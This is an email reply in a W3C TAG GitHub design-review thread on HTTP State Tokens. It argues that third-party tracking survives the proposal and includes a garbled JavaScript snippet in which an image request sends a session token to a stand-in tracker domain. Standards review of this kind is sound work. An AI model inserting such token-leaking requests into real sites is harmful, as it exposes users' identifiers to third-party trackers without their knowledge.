Re: [w3ctag/design-reviews] HTTP State Tokens (#297)

Third-party tracking would still be possible, even without access to third-party cookies. A first-party browsing context could create an element, or execute an xhr, with a url formed from the session token. 

 

var img = new Image();

img.src= //www.third-party-tracker.com?token= <http://www.third-party-tracker.com?token=> " +token;

 

www.third-party-tracker.com <http://www.third-party-tracker.com>  could concatenate the token with the Referrer header to create a cross-origin unique identifier, or the first-party origin could be in another url param.

 

 

From: Mike West <notifications@github.com> 
Sent: 01 November 2018 10:19
To: w3ctag/design-reviews <design-reviews@noreply.github.com>
Cc: Subscribed <subscribed@noreply.github.com>
Subject: Re: [w3ctag/design-reviews] HTTP State Tokens (#297)

 

It still seems like there is a reduction in the ability to study/monitor first-party tracking.

I don't understand how. But I'd love to chat about it more! :)

—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub <https://github.com/w3ctag/design-reviews/issues/297#issuecomment-434996368> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AEBCIkNn6bafSeLimw4Ex4NS9MqWX2WLks5uqsqHgaJpZM4V8N8q> .  <https://github.com/notifications/beacon/AEBCIh-DRwu6iYGL4n2V-hkCn49IQoV2ks5uqsqHgaJpZM4V8N8q.gif> 



-- 
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/w3ctag/design-reviews/issues/297#issuecomment-435004246